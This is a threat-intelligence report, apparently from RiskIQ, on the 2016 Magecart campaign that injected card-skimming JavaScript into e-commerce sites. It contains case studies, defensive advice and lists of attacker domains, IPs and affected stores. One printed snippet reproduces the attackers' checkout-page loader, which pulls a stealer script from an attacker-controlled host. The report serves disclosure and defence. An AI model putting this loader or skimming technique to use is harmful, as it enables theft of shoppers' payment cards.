
# Compromised E-commerce Sites Lead to "Magecart"
##### Publication Date: 2016-10-06 00:00:00+00:00
##### Authors: []
----
Most methods used by attackers to target consumers are commonplace, such as phishing and the use of malware to target payment cards. Others, such as POS (point of sale) malware, tend to be rarer and isolated to certain industries. However, some methods are downright obscure—Magecart, a recently observed instance of threat actors injecting a keylogger directly into a website, is one of these.

 Targeting Consumers Via Retailer Payment Platforms
--------------------------------------------------

 Since the widely publicized breach of Target Corporation, there has been a significant increase in awareness of activity surrounding POS (point of sale) system breaches. But web-based keylogger injection incidents continue to be little-known, even though they've been occurring for even longer than threats related to many high-profile breaches. 

 In 2000, the discovery of a [vulnerability](http://archive.wired.com/politics/law/news/2000/04/35954) in versions of the widely-deployed Cart32 software, which enables consumers to shop online, gave threat actors access to the application as the administrator so they could dump credit card data and run commands on the hosting server. In 2007, discussions like [this](http://forums.oscommerce.com/topic/283542-successful-hack-attacks/) in the OSCommerce community illustrated more instances. Later in 2011, [analysis](http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/100/oscommerce-mass-compromise-leads-to-datastealing-malware-infections) showed additional mass compromise activity in OSCommerce pushing online store visitors to information-stealing malware. 

 Since then, this kind of activity increased, affecting other popular shopping cart software implementations. 

 2016 Magecart Injections
------------------------

 In 2016, the trend continues. Numerous hacked e-commerce websites appear to be affected by a new compromise that injects JavaScript code into the site, which allows attackers to capture payment card information. RiskIQ has observed this campaign ranging back to at least March 2016, with new attacker infrastructure rolling out steadily since then. Public analysis of aspects of the activity was [shared](http://labs.sucuri.net/?note=2016-06-30) in June by Sucuri.

 RiskIQ has termed this set of credit card stealer activity "Magecart" for tracking purposes. Through analysis of data in [RiskIQ Security Intelligence Services](https://www.riskiq.com/products/security-intelligence-services/) and RiskIQ’s [PassiveTotal](https://www.passivetotal.org/), we’ve discovered that, although somewhat similar to other active credit card stealer operations, Magecart is significant for a few reasons.

 
 2. Affected sites are hosted on multiple e-commerce platforms. At least the following technologies are explicitly seen to be impacted by this activity:
 
 
 2.  Multiple payment services provider linkages are targeted on affected sites as well, including:


 
 
 * [Braintree](https://www.braintreepayments.com/)
 * VeriSign payment processing


 
 
 2.  Formgrabber/credit card stealer content is hosted on remote attacker-operated sites served over HTTPS. Stolen data is also exfiltrated to these sites using HTTPS.


 
 
 2.  Attackers have refined their malicious content over time, with identified samples in RiskIQ data showing evidence of:


 
 
 * Testing and capabilities development


 * Increased scope of targeting payment platforms


 * Development and testing of enhancements


 * Addition of obfuscation to hinder analysis and identification


 * Attempts to hide behind brands of commonplace web technologies to blend in on compromised sites


 
 
 2.  The credit card stealer works in a very similar manner on the compromised web server as a banking trojan functions on a compromised victim workstation. Code is injected which can “hook” web forms and access data form submissions much like a 

**formgrabber**. Data is exfiltrated from the compromised server to a 

**dropzone** for attacker collection. There is also some indication in related payloads that attackers may be injecting bogus form fields into payment forms to solicit additional data from victims, similar to how 

**webinjects** operate when logged into a banking website from a compromised endpoint.


 
 [Further insight](http://www.clearskysec.com/magecart) into the functionality of the stealers observed in this campaign is available from ClearSky Cybersecurity. We thank them for their assistance in analyzing and disclosing this threat activity.

 An approximate timeline of observations from analyzed data provides the following insight:

 
 2. March 2016: The domain 

**statsdot.eu** was registered, indicating possible early stages of the immediate Magecart campaign. Injections were simplistic and payloads were largely unobfuscated.


 4. May 2016: An increase in activity was noted in RiskIQ data, with some emergence of obfuscation. Unusual two-stage form of payload delivery observed (two domains used to serve injection to site visitors). The addition of conditional activation of stealer scripts by targeted cart URLs (checkout pages, etc.) was observed.


 6. June 2016: Activity peaked and RiskIQ observed domains with change of hosting to 

**AS203624 DATAFLOWSU**, a 

[recognized](https://blog.opendns.com/2016/09/08/bsides-las-vegas-blackhat-usa-recap/) Eastern European “bulletproof hoster” (hosting and network services provider operated by and catering to cybercriminal interests).


 8. September 2016: Additional obfuscated script injections and remotely hosted JS were observed. At this time, activity is reduced but steady.


 
 How Magecart Works
------------------

 With RiskIQ’s crawling infrastructure, which captures the full sequence of events and page contents—including the Document Object Model (DOM), we can illustrate the operation of this campaign. The following sections present incidents on some affected websites.  
 

 **www.faber.co.uk**   
 In [May 2016](https://sf.riskiq.net/bl/187171578/1913e97fd9d36d19?_sg=qyb8zPsBGsH5puzQeNHkgQ%3D%3D), RiskIQ observed the website of **Faber and Faber**, famed UK book publishing house, to be serving Magecart injections from their Magento site.

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/faber1.png)

 The injection in the source of the site can be seen with a simple addition of a *s*cript tag. When the injected web page on the merchant site is loaded, the malicious keylogger script is also loaded in the background. The keylogger script can access the browser session and submitted data.

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/faber2.png)

 In this case, the cyber attacker delivers the malicious credit card stealer script in two stages:

 1. The injected URL verifies that the page the site visitor is on is a checkout URL where cardholder data will be entered. In the delivered code, it is visible, for example, that the [Firecheckout](http://docs.swissuplabs.com/m2/extensions/firecheckout/) extension for Magento is targeted.

 2. If the test succeeds, the stealer script is loaded from the second stage script URL:

 
> if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
> 
>  {document.write('<script src="https://jquery-cdn.top/mage.js"></script>')};
> 
>  The resulting stealer script as served in this incident is shown below:

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/faber3.png)

 The basic functionality of this script is to capture data from form fields and send the data to the remote URL using an AJAX call. Looking into the hosting for this attacker infrastructure, we see the following components active at the time:

 
> **mageonline.net**  *** [* [* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)](https://community.riskiq.com/search/* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71))](https://community.riskiq.com/search/* [* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)](https://community.riskiq.com/search/* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)))**
> 
>  **jquery-cdn.top**  *** [* [* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)](https://community.riskiq.com/search/* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108))](https://community.riskiq.com/search/* [* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)](https://community.riskiq.com/search/* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)))**
> 
>  *** [* [* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)](https://community.riskiq.com/search/* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108))](https://community.riskiq.com/search/* [* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)](https://community.riskiq.com/search/* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)))** AS20473 | US | AS-CHOOPA - Choopa LLC
> 
>  *** [* [* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)](https://community.riskiq.com/search/* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71))](https://community.riskiq.com/search/* [* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)](https://community.riskiq.com/search/* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)))** AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
> 
>  Domain registration data (domain, registrant date, registrar, nameserver domain(s), registrant name and email):

 
> **JQUERY-CDN.TOP** 2016-05-09 PDR Ltd bitcoin-dns.hosting Ted 31338@* [mail.ru](https://community.riskiq.com/search/mail.ru)
> 
>  **MAGEONLINE.NET** 2016-05-16 PDR LTD. D/B/A PUBLICDOMAINREGISTRY.COM bitcoin-dns.hosting Gregory braun.security@* [* [yandex.com](https://community.riskiq.com/search/yandex.com)](https://community.riskiq.com/search/* [yandex.com](https://community.riskiq.com/search/yandex.com))
> 
>  #### **Note**

 *The domain* ***jquery-cdn.top*** *may sound familiar to readers. In 2014 a threat actor group used the domain* ***jquery-cdn.******com*** *in a series of cyber attacks against websites, injecting malicious redirects into them to hijack visitor traffic to push victims to an instance of a crimeware exploit kit.*  
 [*https://www.riskiq.com/blog/labs/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-at-risk/*](https://www.riskiq.com/blog/labs/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-at-risk/)  
 *This was a different cyber attack campaign with different goals but illustrates a common technique in website hijacking where domain names and similar indicators are chosen with careful intent to allow attacker modifications and network traffic to blend in and avoid suspicion by onlookers. The names of popular JavaScript libraries is a common choice because of their presence on so many websites. A listing of Magecart domains and sampling of URLs is presented at the end of this report to illustrate how this concept influenced this attacker’s choice of naming their infrastructure.*

 A short time later in the month, RiskIQ observed the attack site serving slightly modified payloads:

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/faber4.png)

 We believe this modification indicates work in progress on developing and enhancing the attacker’s code. You can see that commented sections were added to the file referencing form fields related to [Braintree’s](https://www.braintreepayments.com/) Magento module. Braintree is a payment processing service that may be snapped into the Magento platform to facilitate payment handling. The addition of this code may be an indication of the development and expansion of cardholder data targeting by the attacker.

 We also note that the bottom of the file also contains a call to console.log(), which aids the site visitor in debugging elements on the page. Verifying the victim e-commerce site, in this case, we note that the site indeed included Braintree-related JavaScript libraries. Opportunistic attackers may not always be able to predict the internals of how a compromised website handles details like payment processing and credit card handling. However, it's likely that upon access to multiple victim websites, threat actors realized they needed to add additional support for the variety of services used in the e-commerce space, leading to this on-the-fly development.

 **www.everlast.com**   
 [Later in May](https://sf.riskiq.net/bl/165709581/1913e97fd9d36d19?_sg=hpbxDfLb33OtbtagEQECXQ%3D%3D), we identified that the main site of clothing/fitness powerhouse **Everlast Worldwide, Inc.** was compromised and abused to steal credit card data by the same threat actors.

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/everlast1.png)

 As shown in the URL sequence from RiskIQ’s blacklist incident, the URL of the injected stealer script used the filename *everlast.js*., which may indicate that the attackers recognized a major brand at their disposal and took additional steps to attempt to have their malicious code blend in with site contents. This customization of script names to match victim sites is not common across much of the analyzed activity.

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/everlast2.png)

 Like that observed in [other reported activity](https://blog.sucuri.net/2016/06/magento-credit-card-stealer-braintree-extension.html), the stealer code served in this instance is delivered in encoded or obfuscated form. RiskIQ believes this to be a commodity script packer and we note that it is used various capacities by multiple threat actors (observed in malicious website code injections, malicious traffic redirectors, etc.). A portion of the resultant decoded script library is shown below:

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/everlast3.png)

 Stealer code:

 
> **angular.club**  *** [* [* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)](https://community.riskiq.com/search/* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216))](https://community.riskiq.com/search/* [* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)](https://community.riskiq.com/search/* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)))**
> 
>  *** [* [* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)](https://community.riskiq.com/search/* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216))](https://community.riskiq.com/search/* [* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)](https://community.riskiq.com/search/* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)))** AS20473 | US | AS-CHOOPA - Vultr Holdings LLC
> 
>  **ANGULAR.CLUB** 2016-05-15 PDR Ltd. d/b/a PublicDomainRegistry.com bitcoin-dns.hosting Gregory braun.security@* [* [yandex.com](https://community.riskiq.com/search/yandex.com)](https://community.riskiq.com/search/* [yandex.com](https://community.riskiq.com/search/yandex.com))
> 
>  #### **shop.guess.net.au**

 In [July](https://sf.riskiq.net/bl/173554102/1913e97fd9d36d19?_sg=b83eyBqpYKM9phPDH%2BovCg%3D%3D), we observed another major fashion/lifecycle brand affected by the Magecart threat. The **GUESS Australia** online store was affected, and notably not implemented on Magento but rather [Powerfront CMS](http://www.powerfront.com/).

 ![gueAlthough similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.ss1](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![gueAlthough similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.ss1](https://www.riskiq.com/wp-content/uploads/2016/10/guess1.png)

 As shown, the cyber attacker appears to have adapted the name of the stealer script *(/mage-asp.js)* to, in part, reflect the technology on the underlying site—Powerfront CMS is implemented in ASP. 

 Stealer code:

 
>  ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/guess2.png)
> 
>  Significant in this case is that sometime before staging this cyber attack, hosting for the malicious stealer scripts shifted to a different network provider (Dataflow) known for high amounts of threat activity and [noted](https://blog.opendns.com/2016/09/08/bsides-las-vegas-blackhat-usa-recap/) to be a bulletproof hosting provider, servicing criminal customers on a dedicated basis.
> 
>  **mage-js.link**  *** [* [* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)](https://community.riskiq.com/search/* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143))](https://community.riskiq.com/search/* [* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)](https://community.riskiq.com/search/* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)))**
> 
>  *** [* [* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)](https://community.riskiq.com/search/* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143))](https://community.riskiq.com/search/* [* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)](https://community.riskiq.com/search/* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)))** AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
> 
>  **MAGE-JS.LINK** 2016-06-09 Gandi SAS gandi.net Farid Zeynalov abuse@* [dataflow.su](https://community.riskiq.com/search/dataflow.su)
> 
>  #### **www.rebeccaminkoff.com**

 More recently, on [September 19](https://sf.riskiq.net/bl/186829113/1913e97fd9d36d19?_sg=nqDpg2rNMgFnMuPyBB6zTQ%3D%3D), RiskIQ observed the Magento online store of fashion brand **Rebecca Minkoff** (apparel, handbags, and more) affected by Magecart.

 ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/minkoff1-1.png)

 Stealer code:

 
>  ![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==)![Although similar to other active credit card stealer operations, "Magecart" keylogger injection is significant for a few reasons.](https://www.riskiq.com/wp-content/uploads/2016/10/minkoff2.png)
> 
>  **js-syst.su**  *** [* [* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)](https://community.riskiq.com/search/* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145))](https://community.riskiq.com/search/* [* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)](https://community.riskiq.com/search/* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)))**
> 
>  *** [* [* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)](https://community.riskiq.com/search/* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145))](https://community.riskiq.com/search/* [* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)](https://community.riskiq.com/search/* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)))** AS203624 | RU | DATAFLOWSU - ICExpert Company Limited
> 
>  **JS-SYST.SU** 2016-08-25 REGRU-REG-FID reg.ru - [rudneva-y@mail.ua](mailto:rudneva-y@mail.ua)
> 
>  RiskIQ notes a large portion of affected online merchants falling in the fashion and apparel category, believed to be in part because of the popularity of e-commerce in this space to extend storefronts to the Internet.

 Conclusion and Guidance
-----------------------

 As attackers focus on broadening capabilities to seize revenue opportunities, targets of cybercrime face an array of threats. e-commerce site owners must take every step necessary to secure their data and safeguard their payment card information. A bad experience at a retailer site may mean the loss of revenue as impacted users take their money elsewhere. Because Magecart affects websites deployed on commodity CMS and e-commerce software technology, the implementations of which may be outsourced by merchants to third parties, both merchants and integrators must take active roles in ensuring secure environments for deployed sites. Here is RiskIQ’s guidance:

 
 * Merchants should partner with integrators and contractors who can be verified to provide assurances not only of minimum compliance requirements but can also demonstrate transparency around the technologies they utilize and their processes for hardening e-commerce installations and maintaining sound security postures. It is important that merchants do not leave assurance of this as an assumption! Consider specific contract language focused on these key elements together with SLAs.


 
 
 * E-commerce site administrators must ensure familiarity and conformance to recommended security controls and best practices related to e-commerce, and particularly, the software packages utilized. All operating system software and web stack software must be kept up to date. It is critical to remain abreast of security advisories from the software developers and to ensure that appropriate patch application follows, not only for the core package but also third-party plugins and related components. Examples of such resources for the Magento CMS include the following:

 
	 + <https://magento.com/security>
	 + <https://magento.com/security/best-practices> 
 
 
 * Site and system administrators should safeguard credentials used to access admin interfaces and underlying web hosting environments and passwords should be changed regularly. Strong authentication schemes should be utilized where available to reduce the risk from stolen credentials. Multi-factor authentication or two-step verification options are commonplace and effective for this. Use of cryptographic keys and authentication tokens for access to remote hosting servers is recommended over traditional username and password logins.


 
 End users are also at significant risk as it is their payment data that is on the line when engaging in online sales. We recommend the following considerations for consumers:

 
 * Carefully consider the online retailers whose sites you visit and to whom you submit payment data. Understand that at any given time, a portion of online retailers are compromised and present a risk that’s unknown to site owners. Without a high level of visibility and knowledge about cyber attack techniques, it may be difficult to discern high-risk sites. Attempt to do business with merchants you believe are trustworthy and go to great lengths to protect customer data.


 
 
 * Maintain secure configurations on all computers used to carry out online purchases. Any system used for online banking or e-commerce must be a known good or trusted endpoint. This applies to desktops, laptops, tablets, mobile phones, and even virtual machines. Public systems and kiosks should be avoided! Operating system and all application security updates should be up to date. Other security controls may be utilized to address specific risks, such as antivirus software or other endpoint solutions.


 
 
 * An effective control that can prevent cyber attacks such as Magecart is the use of web content whitelisting plugins such as 

[NoScript](https://addons.mozilla.org/en-US/firefox/addon/noscript/) (for Mozilla’s 

[Firefox](https://www.mozilla.org/en-US/firefox/products/)). These types of add-ons function by allowing the end user to specify which websites are “trusted” and prevents the execution of scripts and other high-risk web content. Using such a tool, the malicious sites hosting the credit card stealer scripts would not be loaded by the browser, preventing the script logic from accessing payment card details.


 
 Data and Indicators
-------------------

 You can download the indicator files [here](https://safe.riskiq.com/rs/455-NHF-420/images/magecart_attributes.csv) and [here.](https://safe.riskiq.com/rs/455-NHF-420/images/magecart_misp_event%20%283%29.xml)

 **Cyber Attacker domains**   
 The following domains are observed serving malicious formgrabber code or are in some way closely related to observed domains (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016:

 **abuse-js.link**

 **angular.club**

 **cdn-js.link**

 **docstart.su**

 **govfree.pw**

 **jquery-cdn.top**

 **js-abuse.link**

 **js-abuse.su**

 **js-cdn.link**

 **js-link.su**

 **js-magic.link**

 **js-mod.su**

 **js-save.link**

 **js-save.su**

 **js-start.su**

 **js-stat.su**

 **js-sucuri.link**

 **js-syst.su**

 **js-top.link**

 **js-top.su**

 **jscript-cdn.com**

 **lolfree.pw**

 **mage-cdn.link**

 **mage-js.link**

 **mage-js.su**

 **magento-cdn.top**

 **mageonline.net**

 **mipss.su**

 **mod-js.su**

 **mod-sj.link**

 **sj-mod.link**

 **sj-syst.link**

 **stat-sj.link**

 **statdd.su**

 **statsdot.eu**

 **stecker.su**

 **stek-js.link**

 **syst-sj.link**

 **top-sj.link**

 **truefree.pw**  
 

 **Cyber Attacker IP addresses**   
 The following IP addresses are observed hosting formgrabber domains or are in some way closely related to observed addresses (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016. These IPs are provided with associated routing AS data indicating likely provider of hosting or Internet service:

 *** [* [* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)](https://community.riskiq.com/search/* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108))](https://community.riskiq.com/search/* [* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)](https://community.riskiq.com/search/* [45.32.153.108](https://community.riskiq.com/search/45.32.153.108)))** AS20473 | US | AS-CHOOPA - Choopa LLC

 *** [46.151.52.238](https://community.riskiq.com/search/46.151.52.238)** AS203050 | RU | INTESTELLAR - PE Radashevsky Sergiy Oleksandrovich

 *** [* [* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)](https://community.riskiq.com/search/* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143))](https://community.riskiq.com/search/* [* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)](https://community.riskiq.com/search/* [80.87.205.143](https://community.riskiq.com/search/80.87.205.143)))** AS203624 | RU | DATAFLOWSU - ICExpert Company Limited

 *** [* [* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)](https://community.riskiq.com/search/* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145))](https://community.riskiq.com/search/* [* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)](https://community.riskiq.com/search/* [80.87.205.145](https://community.riskiq.com/search/80.87.205.145)))** AS203624 | RU | DATAFLOWSU - ICExpert Company Limited

 *** [80.87.205.236](https://community.riskiq.com/search/80.87.205.236)** AS203624 | RU | DATAFLOWSU - ICExpert Company Limited

 *** [104.238.177.224](https://community.riskiq.com/search/104.238.177.224)** AS20473 | US | AS-CHOOPA - Vultr Holdings LLC

 *** [* [* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)](https://community.riskiq.com/search/* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71))](https://community.riskiq.com/search/* [* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)](https://community.riskiq.com/search/* [108.61.188.71](https://community.riskiq.com/search/108.61.188.71)))** AS20473 | US | AS-CHOOPA - Vultr Holdings LLC

 *** [* [* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)](https://community.riskiq.com/search/* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216))](https://community.riskiq.com/search/* [* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)](https://community.riskiq.com/search/* [108.61.211.216](https://community.riskiq.com/search/108.61.211.216)))** AS20473 | US | AS-CHOOPA - Vultr Holdings LLC

 *** [167.114.35.70](https://community.riskiq.com/search/167.114.35.70)** AS16276 | FR | OVH - OVH Hosting Inc.

 *** [185.25.51.176](https://community.riskiq.com/search/185.25.51.176)** AS61272 | LT | IST - Informacines Sistemos Ir Technologijos UAB

 *** [217.12.202.82](https://community.riskiq.com/search/217.12.202.82)** AS59729 | BG | ITL - ITL Company

 *** [217.12.203.110](https://community.riskiq.com/search/217.12.203.110)** AS59729 | BG | ITL - ITL Company

 **Sample URLs**   
 The following data consists of a set of sample Magecart URLs observed injected into affected websites, sorted by an observed date of occurrence:

 **statsdot.eu/mage.js # 2016-05-06**

 **jquery-cdn.top/mage.js # 2016-05-22**

 **jquery-cdn.top/tmp.js # 2016-05-31**

 **mageonline.net/js/mage.js # 2016-05-27**

 **angular.club/js/vanguardgear.js # 2016-05-29**

 **angular.club/js/everlast.js # 2016-05-30**

 **mage-js.link/mage-asp.js # 2016-07-12**

 **cdn-js.link/cdn-js/mage.js # 2016-07-25**

 **statsdot.eu/mag.js # 2016-08-14**

 **sj-syst.link/sj-syst/ocart.js # 2016-08-16**

 **js-save.link/js-save/mage.js # 2016-08-18**

 **mage-cdn.link/cp/mage.js # 2016-08-18**

 **mage-cdn.link/mage.js # 2016-08-21**

 **mage-js.link/mage.js # 2016-09-04**

 **jscript-cdn.com/mage.js # 2016-09-16**

 **js-syst.su/mage-script.php # 2016-09-19**

 **Affected websites**   
 The following data provides a list of affected websites observed to be serving script injections to known Magecart content hosting and data collection hosts over the observed timeframe. This information is extracted from RiskIQ crawl sequences and presented in the form of *host pairs* through PassiveTotal, our solution for investigators and responders exploring the Digital Footprints of malicious actors.

 **aufdemkerbholz.de**

 **backstage.gs**

 **eyeglass.com**

 **farmwholesale.com**

 **fidelitystore.com**

 **giftshop.cancerresearchuk.org**

 **gkboptical.com**

 **gypsyville.com**

 **ihomecases.com**

 **kerbholz.com**

 **lenshareca.com**

 **mamapanda.com**

 **mauriziocollectionstore.com**

 **sasshoes.com**

 **saudi.miniexchange.com**

 **shop.air-care.com**

 **shop.guess.net.au**

 **shop2.gzanders.com**

 **shoppu.com.my**

 **storeinfinity.com**

 **truthbookpublishersstore.org**

 **valuedrugs.net**

 **www.5thavenuedog.com**

 **www.aalens.com**

 **www.agssalonequipment.com**

 **www.apacwines.com**

 **www.arenaswimwearstore.com**

 **www.ariashop.co.uk**

 **www.arvaco.com**

 **www.aurigaeurope.com**

 **www.ausnaturalcare.com.au**

 **www.babysavings.com.au**

 **www.bellfieldclothing.com**

 **www.benmoss.com**

 **www.bogglingshop.com**

 **www.brandvapors.com**

 **www.brooktaverner.co.uk**

 **www.capstore.dk**

 **www.cbcrabcakes.com**

 **www.chefcentral.com**

 **www.clarke-distributing.com**

 **www.clickandgrill.de**

 **www.cottinfab.com**

 **www.countrywidehealthcare.co.uk**

 **www.crossingbroadstore.com**

 **www.dgpartsmall.com**

 **www.donnabeleza.com.br**

 **www.douglovesshirts.com**

 **www.eddymerckx.com**

 **www.emarket.com.kw**

 **www.evergreen.ie**

 **www.everlast.com**

 **www.faber.co.uk**

 **www.faberacademy.co.uk**

 **www.fidelitystore.com**

 **www.freedomflask.com**

 **www.ghurka.com**

 **www.gingerandsmart.com**

 **www.gkboptical.com**

 **www.golights.com.au**

 **www.grahamandgreen.co.uk**

 **www.greekpaddles.net**

 **www.huntingandfishing.co.nz**

 **www.iloveshowpo.com**

 **www.karity.com**

 **www.knetgolf.com**

 **www.kosherwine.com**

 **www.laploma.in**

 **www.leasevillenocredit.com**

 **www.lions-pride.com**

 **www.littlelittleorganics.com**

 **www.lostgolfballs.com**

 **www.mackenzieltd.com**

 **www.mcs.com**

 **www.minervabeauty.com**

 **www.miniexchange.com**

 **www.mothercare.co.id**

 **www.musclefood.com**

 **www.musingapore.cn**

 **www.muzzle-loaders.com**

 **www.mylook.ee**

 **www.nationalcargocontrol.com**

 **www.nessaleebaby.com**

 **www.nichecycle.com**

 **www.onesolestore.com**

 **www.owgartenmoebel.de**

 **www.ozeparts.com.au**

 **www.paykobo.com**

 **www.personalizationuniverse.com**

 **www.punkstuff.com**

 **www.rebeccaminkoff.com**

 **www.reservewineclub.com.sg**

 **www.retaildeal.biz**

 **www.rosesonly.com.sg**

 **www.royaldiscount.com**

 **www.santonishoes.com**

 **www.savannahcollections.com**

 **www.shopboss.com.br**

 **www.showpo.com**

 **www.shrimpandgritskids.com**

 **www.skinsolutions.md**

 **www.slimminglabs.com**

 **www.smoothmag.com**

 **www.sophieparis.com**

 **www.stagespot.com**

 **www.storeinfinity.com**

 **www.superbikestore.in**

 **www.surthrival.com**

 **www.thebeautyplace.com**

 **www.titanssports.com.br**

 **www.todaycomponents.com**

 **www.tonnotermans.nl**

 **www.ukbathroomstore.co.uk**

 **www.umnitza.com**

 **www.voicerecognition.com.au**

 **www.waterfilters.net**

 **www.wesellusedsound.co.za**

 **www.windsorsmith.com.au**

 **www.zalacliphairextensions.com.au**

 Questions? Feedback? Email [research-feedback@riskiq.net](mailto:research-feedback@riskiq.net) to contact our research team.

 
        